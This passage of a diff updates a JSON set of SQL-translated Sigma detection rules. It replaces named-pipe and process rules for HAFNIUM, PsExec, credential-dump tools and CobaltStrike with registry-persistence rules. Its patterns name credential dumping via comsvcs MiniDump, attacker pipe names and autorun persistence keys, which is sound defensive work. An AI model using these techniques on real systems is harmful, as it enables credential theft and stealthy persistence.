ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Add DisallowRun Execution to Registry", + "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "status": "experimental", + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (NewProcessName LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR NewProcessName LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_disallowrun_execution.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", - "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "status": "experimental", + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.005" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "PsExec Pipes Artifacts", - "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", - "status": "test", - "description": "Detecting use PsExec via Pipe Creation/Access to pipes", - "author": "Nikita Nazarov, oscd.community", + "title": "CurrentVersion Autorun Keys Modification", + "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator activity" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND NewValue LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND NewValue IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND NewValue LIKE '%}\\\\python-%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND NewValue = 'ctfmon.exe /n') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (NewValue LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND NewValue LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" ], - "filename": "pipe_created_psexec_pipes_artifacts.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "title": "Potential Persistence Via Event Viewer Events.asp", + "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" - ], - "falsepositives": [ - "Legitimate Administrator using tool for password recovery" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" - ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" - }, - { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", - "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", + "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND NewValue LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND NewValue LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (NewValue = 'http://go.microsoft.com/fwlink/events.asp') OR (NewValue = '(Empty)')))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_persistence_event_viewer_events_asp.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Modification of Explorer Hidden Keys", + "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "status": "experimental", + "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_hide_file.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "Service Binary in Uncommon Folder", + "id": "277dc340-0540-42e7-8efb-5ff460045e07", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "description": "Detect the creation of a service with a service binary located in a uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_creation_service_uncommon_folder.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", - "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "Persistence Via New SIP Provider", + "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1553.003" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Legitimate SIP being registered by the OS or different software." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry 